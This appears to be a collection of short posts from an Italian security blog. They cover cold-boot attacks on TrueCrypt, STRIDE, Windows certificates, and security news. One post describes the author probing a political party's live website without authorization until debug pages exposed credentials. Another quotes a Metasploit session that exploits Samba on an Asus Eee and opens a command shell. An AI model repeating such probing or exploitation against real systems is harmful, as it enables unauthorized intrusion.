CyberSecurity 1337

E' l'unico modo :-) A rischio sono soprattutto i dischi rigidi aziendali. Resta sempre valido il consiglio di utilizzare dei cifratori di volumi per i vostri dati su computer "esterni" (ex: computer nel posto di lavoro).

Vi sembra strano? Assolutamente no . Alcune memorie mantengono lo stato per un tempo successivo allo spegnimento. E così qualche buontempone ha deciso di fare un paper in cui dimostra come recuperare le password dei cifratori di volumi utilizzati per esempio nei portatili. TrueCrypt ne è un esempio. Il video è molto interessante ed il paper ancor dippiù . Certo scovare la password all'interno del dump della memoria non è cosa banale, ma la tecnica illustrata è interessante: cercare nella memoria un probabile keyschedule e selezionare i più probabili in base alla minima distanza di Hamming . Comunque il video vale più di mille parole :-)

Il problema è stato risolto e anche abbastanza velocemente. Certo, come evidenziato da colleghi più autorevoli di me, problemi di design architetturale potranno difficilmente essere sanati con qualche workaround software. Per correttezza devo dire che il primo ad aver notificato questo problema, anche a PI, è stato Alessio Marziali e questo è il suo Post dell' 11 settembre. Inutile dire che già il buon Alessio aveva segnalato il problema alla società e che anche allora è stato corretto abbastanza presto.

Eh no, non ci posso credere. Me ne andavo in giro per il Web quando sono capitato sul sito del PD (Partito Democratico) e sono stato attirato dalla sua URL: http://www.partitodemocratico.it/default.asp?c=/gw/templates/default.htm Mhhhh...mi ricordavo un vecchio post di Raffaele su un modo un po' barbarico di gestire la sicurezza applicativa in ASP.NET (si si amici cari il sito del PD è fatto in ASP.NET) e conoscendo un po' l'ambiente ho fatto due prove: Mi sono sbagliato ma, toh! ecco quello che compare :-) Una bella schermata di errore con lo stack trace e addirittura le righe di codice. Il non disabilitare la messaggistica di debug nei siti o nelle applicazioni in produzione è un classico errore di sicurezza applicativa. E adesso provo con quello giusto: BOOM: username e password del DB, del web server, e l'IP del DB è pubblico....brrrhhhhhhh!!!! Che dire: " Errare humanum est, perseverare autem diabolicum " I link in questo post sono scritti in modo errato...

Questa mi mancava: Le ricette scientifiche: la carbonara Utilissimo vademecum per cucinare uno dei miei piatti preferiti. E per farvi venire un po' di fame :-)

Lo so, adesso qualcuno di voi mi etichetterà come Windowsiano, ma mi capita non di rado di parlare con esperti di sicurezza (o sedicenti tali) che non conoscono affatto il sistema di gestione dei certificati di Windows: store dei certificati, CryptoAPI, CAPICOM, CSP. Tutti concetti non trascurabili e assolutamente fondamentali nel caso di soluzioni di firma elettronica o digitale (anche una semplice SmartCard). Anche qui vi giro dei post di Mario Fontana fatti veramente bene e che possono essere un'utile introduzione ai concetti base. Certificati digitali in Windows : tutto quello che un Architetto dovrebbe sapere Store dei certificati in Windows : tutto quello che un Architetto dovrebbe sapere Certificati, Store e un po' di utilities via CryptoAPI

E per la terza volta un po' di blogroll sul terzo post di Mario: A volte ritornano... CAPICOM - parte 3 - Encryption Anche se siete dei Pinguini, non potete ignorare le CAPICOM. Se vi occupate di sicurezza spesso queste librerie vi permettono di implementare soluzioni niente male. Sì sì, ok voi appartenete all'altra parte del mondo: PKCS#11 :-)

Nei post precedenti sulla sicurezza applicativa abbiamo visto che nella fase dedicata ai casi di abuso e dei requisiti di sicurezza, un modello come STRIDE può essere di aiuto nel definire i pattern di attacco tra cui estrarre il modello di attacco (ovvero il sottoinsieme dei possibili attacchi) per il nostro sistema applicativo. STRIDE ha l'indubbio vantaggio di non essere eccessivamente astratto ed è invece facilmente riconducibile a situazioni reali. Se fate delle ricerche su Internet troverete che STRIDE viene definito un sistema per la modellazione delle minacce. Io non sono d'accordo su questa definizione e ritengo (come Gary McGraw) che STRIDE sia un modello relativo ai possibili attacchi, legando la "minaccia" invece agli attori (umani e non) che sono invece gli artefici degli attacchi. STRIDE è l'acronimo di: Spoofing , Tampering , Repudiation , Information disclosure , DoS , Elevation of privilege: Spoofing dell'identità : "sono attacchi che con...

Ma guarda te...esistono anche le vulnerabilità su Mac OS X? Chi lo avrebbe mai detto ;-) Questo il documento di Apple con 11 vulnerabilità del 7 febbraio scorso. La maggior parte di queste sono sfruttabili con il caro vecchio buffer overflow. Sono esterrefatto: ma i SO della Apple non erano costruiti con la kriptonite? E i coder Apple non avevano il canary mentale per evitare l'esecuzione di codice malizioso? E FreeBSD (o OpenDarwin) non è lo stato dell'arte del coding sicuro?

E' uscita la nuova versione di TrueCrypt 5.0 (ricordo che è Free e Open Source). Importanti le novità: Features : permette di cifrare una intera partizione del disco con un'autenticazione pre-boot; inserita una pipeline per le operazioni di read/write che migliorano le prestazioni fino al 100% su Windows; nuova versione per Mac OS X; GUI per TrueCrypt su Linux; utilizzo di XTS - approvato recentemente come standard IEEE 1619 - per la protezione crittografica di device per lo storage a blocchi; sostituzione dello SHA1 con il più sicuro SHA-512. Bug fix : versione su Linux completamente ridisegnata per sopperire ai problemi dovuti all'aggiornamento del kernel; correzioni di bug e falle di sicurezza. Ho provato la nuova versione sia su Windows XP che su Vista Home Premium. Su XP Professional o Home nessun problema. Potete addirittura non disinstallare la vecchia versione, reinstallando tutto sopra. In Vista consiglio di disinstallare la vecchia versione, riavviare e poi ins...

Ahi ahi ahi... Il debutto dell' Asus Eee si porta dietro qualche critica di sicurezza per le versioni dei pacchetti installati. Su http://www.risesecurity.org/ viene presentato un attacco alla Eee dalla A alla Z. Versioni dei pacchetti, individuazione del pacchetto con vulnerabilità, exploit con Metasploit e Shell! Ecco la prova: msf exploit(lsa_transnames_heap) > set TARGET 1 TARGET => 1 msf exploit(lsa_transnames_heap) > exploit [*] Started bind handler [*] Creating nop sled.... ... [*] Trying to exploit Samba with address 0x08415000... [*] Connecting to the SMB service... [*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ... [*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ... [*] Calling the vulnerable function... [+] Server did not respond, this is expected [*] Command shell session 1 opened (192.168.50.201:33694 -> 192.168.50.10:4444) msf exploit(lsa_transnames_heap) > sessions -i 1 [...

Le best practice che qui presento sono relative alla fase di analisi dei requisiti di sicurezza nel ciclo di vita del software, e definiscono i passi fondamentali per la formalizzazione dei casi di abuso e dei requisiti di sicurezza di un'applicazione. Per "casi di abuso" si intende la formalizzazione di casi di uso, in cui il termine "uso" è relativo all'attività di un attore malizioso che attui una o più minacce mediante dei pattern di attacco sfruttando una o più vulnerabilità dell'applicazione . Alla luce dei casi di abuso formalizzati si sarà in grado di esplicitare i requisiti di sicurezza dell'applicazione. Per "requisiti di sicurezza" si intendono le funzionalità e i meccanismi di sicurezza, da implementare nell'applicazione, per contrastare gli scenari evidenziati nei casi di abuso . Le best practice proposte sono in ordine temporale, ma in ogni momento è possibile riconsiderare best practice già valutate precedentemente alla ...

Qualcuno forse ricorderà quando la scorsa estate l'Estonia accusò la Russia di averla attaccata con un DDoS . Si parlò subito di CyberWar , di pericolo globale con l'Estonia che chiese anche l'intervento della NATO! Pochi giorni fa si è invece scoperto che il DDoS è stato provocato da un malware ideato da un Estone di 20 anni . Il "ragazzotto" è stato condannato al pagamento di una somma equivalente a 1.620 dollari e mandato a casa. Qualcuno rimarrà deluso? Insomma se leggete la notizia sul giornale vuol dire che non erano dei veri professionisti ;-) "Un bravo hacker non è quello che si introduce in un sistema con abilità, ma quello che ne esce senza lasciar traccia..."

Un pò di foto in più dell'evento dal sito ufficiale del gruppo di sicurezza del dipartimento di Informatica. Whitfield Diffie meets with Dipartimento di Informatica - Università di Roma "La Sapienza"

Il buon Mario continua con queste "perle": CAPICOM 2: A volte ritornano... CAPICOM - parte 2 - Firma Digitale Certificati Digitali e Windows: Certificati digitali in Windows : tutto quello che un Architetto dovrebbe sapere Vi consiglio di leggerli. Se come me dovrete implementare delle CA interne, magari anche su Linux con OpenSSL (ottimo spunto per un POST), dovrete conoscere come il mondo Microsoft interagisce con X.509 e PKI. Anche perché nel 99% dei casi i vostri client saranno Windows. Altrimenti potreste trovarvi nei guai :-) Non ci credete? Mettete su una CA e poi ne riparliamo ;-) Comunque vi anticipo che i vostri maggiori litigi saranno nel capire quali benedette estensioni X.509 V3 dovrete assegnare al certificato...